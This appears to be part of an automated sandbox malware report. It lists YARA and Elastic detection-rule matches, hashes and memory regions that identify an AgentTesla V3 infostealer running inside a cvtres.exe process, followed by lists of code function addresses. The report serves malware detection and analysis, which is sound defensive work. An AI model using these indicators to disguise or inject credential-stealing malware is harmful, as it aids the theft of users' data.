                Source: 3.2.cvtres.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bEEE02A64u002dA051u002d4832u002d8500u002dBCB6E03153A3u007d/u003277DE882u002dD82Fu002d4CFAu002d82FDu002d8DA69792B4E8.csLarge array initialization: .cctor: array initializer size 12005
                Source: 3.0.cvtres.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bEEE02A64u002dA051u002d4832u002d8500u002dBCB6E03153A3u007d/u003277DE882u002dD82Fu002d4CFAu002d82FDu002d8DA69792B4E8.csLarge array initialization: .cctor: array initializer size 12005
                Source: 3.0.cvtres.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bEEE02A64u002dA051u002d4832u002d8500u002dBCB6E03153A3u007d/u003277DE882u002dD82Fu002d4CFAu002d82FDu002d8DA69792B4E8.csLarge array initialization: .cctor: array initializer size 12005
                Source: 3.0.cvtres.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bEEE02A64u002dA051u002d4832u002d8500u002dBCB6E03153A3u007d/u003277DE882u002dD82Fu002d4CFAu002d82FDu002d8DA69792B4E8.csLarge array initialization: .cctor: array initializer size 12005
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6, id = f2a90d14-7212-41a5-a2cd-a6a6dedce96e, last_modified = 2022-04-12
                Source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe PID: 2280, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC190 KiUserExceptionDispatcher,DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC1EF KiUserExceptionDispatcher,DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC1B1 KiUserExceptionDispatcher,DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC99F DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC955 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC90E DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC8C7 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC880 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC839 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC3F6 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC3AF DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC352 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC30B DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC2C4 KiUserExceptionDispatcher,DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC27D KiUserExceptionDispatcher,DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC236 KiUserExceptionDispatcher,DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC5CC DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC58E DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC547 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC509 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC4C2 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC47B DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC434 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC7F2 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC7AB DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC764 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC71D DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC6D6 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC68F DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC190 KiUserExceptionDispatcher,DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC648 DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09ECC60A DisplayExitWindowsWarnings,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A5A481
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A58C00
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A51C50
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A535A8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A59D1A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A5AD61
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A52630
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A587D8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A59720
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A51340
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A534A1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A54480
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A5040A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A55868
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A54471
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A50448
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A59448
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A55858
